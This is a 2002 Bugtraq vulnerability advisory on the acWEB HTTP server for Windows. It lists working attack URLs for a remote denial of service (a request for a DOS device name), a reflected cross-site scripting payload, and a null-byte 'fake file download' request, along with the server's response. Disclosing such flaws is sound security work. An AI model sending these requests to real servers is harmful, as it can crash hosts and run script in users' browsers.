From downbload@hotmail.com Wed Sep 25 18:24:52 2002 From: DownBload To: bugtraq@securityfocus.com Date: 25 Sep 2002 09:08:20 -0000 Subject: IIL Advisory: Vulnerabilities in acWEB HTTP server [ Illegal Instruction Labs Advisory ] [-------------------------------------------------------------------------] Advisory name: Vulnerabilities in acWEB HTTP server Advisory number: 13 Application: acWEB HTTP server Author e-mail: spf@users.sourceforge.net Homepage: somewhere on sourceforge Date: 10.09.2002 Impact: DoS, XSS, etc. Tested on: Windows 98 Discovered by: DownBload Mail me @: downbload@hotmail.com ======[ Overview Sourceforge: "acWEB is an OpenSource replacement for MS IIS and other proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by viruses like CodeRed, Nimda, etc :)." /ME says: acWEB is simple HTTP server for Windows. It is perfect for tiny companies, and for home use. ======[ Problem(s) ===[ Remote DoS First vulnerability which I discovered in acWEB HTTP server was remote DoS. It is possible to crush acWEB (and Windows too) with simple HTTP request: ---cut here--- http://www.victim.com/com2.bat ---cut here--- ===[ XSS a.k.a CSS bug XSS code execution: ---cut here--- http://www.victim.com/%db<script>alert('Illegal%20Instruction%20Labs% 200wnz%20YoU!!!');</script>/ ---cut here--- ===[ Fake file download ---cut here--- http://www.victim.com/|%5chacked.txt%00 ---cut here--- When this request it sent to acWEB HTTP server, acWEB will return: --------------- HTTP/1.0 200 OK Content-Length: 0 Connection: Close Content-Type: application/octet-stream Server: Eserv/3.x --------------- That is fuqn weird, because file 'hacked.txt' don't exist. acWEB HTTP server will send us 'hacked.txt' empty file to download. ======[ Exploit This can be exploited with browser, so I won't write exploit for this...or maybe one day :). ======[ Greetz Greetz goes to #hr.hackers, #ii-labs and #linux . Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org (NetZero & Paradox). I'm very sorry if I forgot someone.